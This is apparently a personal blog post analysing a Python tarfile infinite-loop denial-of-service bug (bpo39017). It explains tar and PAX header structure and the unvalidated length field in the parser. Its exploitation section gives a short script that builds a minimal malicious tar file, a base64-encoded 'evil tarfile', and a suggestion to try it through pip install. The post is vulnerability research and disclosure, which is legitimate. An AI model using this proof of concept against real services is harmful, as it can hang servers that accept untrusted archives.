Python tarfile infinite loop DoS
The python tarfile
module can end up in an infinite loop when opening maliciously malformed tar files.
I came across Denial of Service bug bpo39017 when browsing the python bug tracker for security issues (I didn't discover this bug myself). The error-reproducing zipfile the reporter uploaded is direct from the fuzzer, but I wanted to understand and isolate the issue by making the smallest tarfile which reproduces the bug.
Tarfile structure #
The name tar is derived from "tape archive" which harks back to its 1979 release to help store multiple files on magnetic tape. Tar files are made up of blocks of 512 bytes. There's no overall header or central directory: to list files you'll need to scan through the tarfile and read all the header records. Any header struct (257 bytes) or content will be padded to the block size, so most of a tarfile will be NULL bytes. The header is a bit gross, having integer fields encoded as ASCII digits in octal.
Serious tarfile vulnerabilities #
The tarfile headers contain the archived filenames. If the filename is an absolute path, some tarfile implementations can be tricked into extracting files to arbitrary locations. Arbitrary write may also be possible when extracting symlinks. The same issues affect other archive formats. This post isn't about these vulnerabilities.
PAX #
The bug is in python's tarfile
module's processing of PAX header records. PAX is extensions for tar which add properties left out of the original tar header struct, or which don't fit within the fixed size fields defined in times gone by e.g. symlinks, arbitrary resolution timestamps, uids > 2097151, file sizes > 8GB, long filenames. If we want to specify PAX information for a file, we make a fake file with the typeflag
in the header record set to x
or g
. The fake file's content is the extra PAX headers. The next block can contain the normal header record for the file, followed by blocks containing the file contents.
You can try to make a PAX tarfile: (Without --blocking-factor
, each block is some multiple of 512 bytes)
echo "myfilecontent" > myfile
tar -cf hello.tar --format=pax --blocking-factor=1 myfile
hexdump -C hello.tar
00000000 2e 2f 50 61 78 48 65 61 64 65 72 73 2e 31 39 31 |./PaxHeaders.191| # Header for fake file
00000010 37 37 2f 6d 79 66 69 6c 65 00 00 00 00 00 00 00 |77/myfile.......|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000060 00 00 00 00 30 30 30 30 36 34 34 00 30 30 30 30 |....0000644.0000|
00000070 30 30 30 00 30 30 30 30 30 30 30 00 30 30 30 30 |000.0000000.0000|
00000080 30 30 30 30 30 36 31 00 30 37 30 33 33 32 34 31 |0000061.07033241|
00000090 36 30 30 00 30 31 32 31 36 34 00 20 78 00 00 00 |600.012164. x...|
000000a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000100 00 75 73 74 61 72 00 30 30 00 00 00 00 00 00 00 |.ustar.00.......|
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000200 31 39 20 61 74 69 6d 65 3d 39 34 36 36 38 34 38 |19 atime=9466848| # PAX header records
00000210 30 30 0a 33 30 20 63 74 69 6d 65 3d 31 35 39 34 |00.30 ctime=1594|
00000220 33 34 30 33 32 30 2e 38 30 31 30 37 35 30 36 35 |340320.801075065|
00000230 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000400 6d 79 66 69 6c 65 00 00 00 00 00 00 00 00 00 00 |myfile..........| # File header
00000410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000460 00 00 00 00 30 30 30 30 36 34 34 00 30 30 30 31 |....0000644.0001|
00000470 37 35 30 00 30 30 30 31 37 35 30 00 30 30 30 30 |750.0001750.0000|
00000480 30 30 30 30 30 31 36 00 30 37 30 33 33 32 34 31 |0000016.07033241|
00000490 36 30 30 00 30 31 31 36 35 30 00 20 30 00 00 00 |600.011650. 0...|
000004a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000500 00 75 73 74 61 72 00 30 30 62 65 6e 00 00 00 00 |.ustar.00ben....|
00000510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000520 00 00 00 00 00 00 00 00 00 62 65 6e 00 00 00 00 |.........ben....|
00000530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000540 00 00 00 00 00 00 00 00 00 30 30 30 30 30 30 30 |.........0000000|
00000550 00 30 30 30 30 30 30 30 00 00 00 00 00 00 00 00 |.0000000........|
00000560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000600 6d 79 66 69 6c 65 63 6f 6e 74 65 6e 74 0a 00 00 |myfilecontent...| # File content
00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
00000c00 # 2 completely NULL blocks added at end
Notice those *
lines which are multiple lines of NULL bytes. 512 = 0x200, so blocks start at 0x0, 0x200, 0x400, 0x600, 0x800, 0xA00.
PAX headers structure #
A PAX header record is a UTF-8 encoded string of the format: "%d %s=%s\n", <length>, <keyword>, <value>
Several of these records can be concatenated.
The length is the length of the record, including the length field and the ending newline. The keyword cannot contain an equals sign. Standard keywords include 'path' & 'atime'.
The bug #
The length
and keyword
are extracted with a regex. That's not the problem. The problem is that the length is not validated and we use the length
variable to iterate:
regex = re.compile(br"(\d+) ([^=]+)=")
pos = 0
while True:
match = regex.match(buf, pos)
if not match:
break
length, keyword = match.groups()
...
pos += length
If length
is zero, e.g. if buf
contains "0 X="
, we loop forever.
Does this affect other languages? #
In the rust crate tar-rs, the block is first split on newline characters. The length field is then checked against the actual length of the record. I didn't see any tarfile documentation that forbids newline characters within a keyword. This library would reject such a record, but that's almost definitely ok. Golang checks that the length is sensible and then that the record ends in a newline. Ruby and php seem ok.
This is probably a python-only bug.
Exploitation #
First we make a 512-byte header block specifying that the following block is PAX information (type is 'x' or 'g'). Then we append "0 X="
for a total of 516 bytes.
Feed the output file into tarfile.open()
or tarfile.is_tarfile()
and wait a very long time. Or try pip install recursion.tar
. I'd imagine that the pypi server is vulnerable to this, but untrusted tarfiles aren't ingested by too many python services as far as I'm aware.
Script for minimal reproducing tarfile:
def make_file() -> bytearray:
header = bytearray(512)
header[0x7c] = 0x31 # size = ASCII '1' (must be > 0)
header[0x94:0x9d] = b"000630\x00 g" # chksum + typeflag 'g'
return header + b"0 X="
with open("recursion.tar", "wb") as f:
f.write(make_file())
Downloads #
- an evil tarfile
- base64 decode this tar.gz
H4sICANcB18AA3gAS0pOzMlJLWIYCGCIQ9zAwMjQ1JRBIZ2urhmZwEAhwhYAT1CwIgQCAAA=
- Previous: 我們都不完美
- Next: DEFCON:SM Car Hacking